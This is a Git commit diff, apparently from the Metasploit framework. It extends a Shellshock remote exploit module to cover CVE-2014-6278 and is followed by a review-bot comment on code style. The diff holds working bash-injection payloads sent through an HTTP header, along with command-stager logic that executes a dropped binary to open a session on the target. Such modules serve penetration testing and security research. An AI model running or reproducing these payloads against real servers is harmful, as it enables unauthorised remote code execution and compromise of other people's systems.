Add CVE-2014-6278 support to the exploit module

Same thing.
bug/bundler_fix
William Vu 2014-10-01 17:58:25 -05:00
parent 51bc5f52c1
commit c1b0acf460
No known key found for this signature in database
GPG Key ID: E761DCB4C1629024
1 changed files with 22 additions and 8 deletions


@ -22,10 +22,12 @@ class Metasploit4 < Msf::Exploit::Remote
'Author' => [
'Stephane Chazelas', # Vulnerability discovery
'wvu', # Original Metasploit aux module
'juan vazquez' # Allow wvu's module to get native sessions
'juan vazquez', # Allow wvu's module to get native sessions
'lcamtuf' # CVE-2014-6278
],
'References' => [
['CVE', '2014-6271'],
['CVE', '2014-6278'],
['OSVDB', '112004'],
['EDB', '34765'],
['URL', 'https://access.redhat.com/articles/1200223'],
@ -64,12 +66,13 @@ class Metasploit4 < Msf::Exploit::Remote
OptString.new('HEADER', [true, 'HTTP header to use', 'User-Agent']),
OptInt.new('CMD_MAX_LENGTH', [true, 'CMD max line length', 2048]),
OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin']),
OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5])
OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5]),
OptEnum.new('CVE', [true, 'CVE to check/exploit', 'CVE-2014-6271', ['CVE-2014-6271', 'CVE-2014-6278']])
], self.class)
end
def check
res = req("echo #{marker}")
res = req("echo #{marker}", datastore['CVE'])
if res && res.body.include?(marker * 3)
return Exploit::CheckCode::Vulnerable
@ -105,31 +108,42 @@ class Metasploit4 < Msf::Exploit::Remote
# A last chance after the cmdstager
# Trying to make it generic
unless session_created?
req("#{stager_instance.instance_variable_get("@tempdir")}#{stager_instance.instance_variable_get("@var_elf")}")
req("#{stager_instance.instance_variable_get("@tempdir")}#{stager_instance.instance_variable_get("@var_elf")}", datastore['CVE'])
end
end
def execute_command(cmd, opts)
cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
req(cmd)
req(cmd, datastore['CVE'])
end
def req(cmd)
def req(cmd, cve)
case cve
when 'CVE-2014-6271'
sploit = cve_2014_6271(cmd)
when 'CVE-2014-6278'
sploit = cve_2014_6278(cmd)
end
send_request_cgi(
{
'method' => datastore['METHOD'],
'uri' => normalize_uri(target_uri.path.to_s),
'headers' => {
datastore['HEADER'] => sploit(cmd)
datastore['HEADER'] => sploit
}
}, datastore['TIMEOUT'])
end
def sploit(cmd)
def cve_2014_6271(cmd)
%Q{() { :;};echo -e "\\r\\n#{marker}$(#{cmd})#{marker}"}
end
def cve_2014_6278(cmd)
%Q{() { _; } >_[$($())] { echo -e "\\r\\n#{marker}$(#{cmd})#{marker}"; }}
end
def marker
@marker ||= rand_text_alphanumeric(rand(42) + 1)
end
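Review bot: The `case cve` in the new `req(cmd, cve)` has no `else` branch, so any value other than the two string literals leaves `sploit` nil and the request is sent with a nil header value instead of failing; the OptEnum bounds `datastore['CVE']`, but `req` takes `cve` as a plain argument and nothing in the method itself enforces the set. Add `else fail_with(Failure::BadConfig, "Unsupported CVE: #{cve}")` before the `end` of the case so a bad value is reported at the call site rather than surfacing as a malformed request. Since all three callers pass `datastore['CVE']` (in `check`, the post-stager retry, and `execute_command`), a default of `def req(cmd, cve = datastore['CVE'])` would also remove that repetition. The new `cve_2014_6278` method is undocumented where `cve_2014_6271` at least inherits its meaning from the old `sploit` name; a one-line comment such as `# CVE-2014-6278 variant (credited to lcamtuf in the Author list)` above it would help the next reader. The enclosing class continues past the end of this hunk.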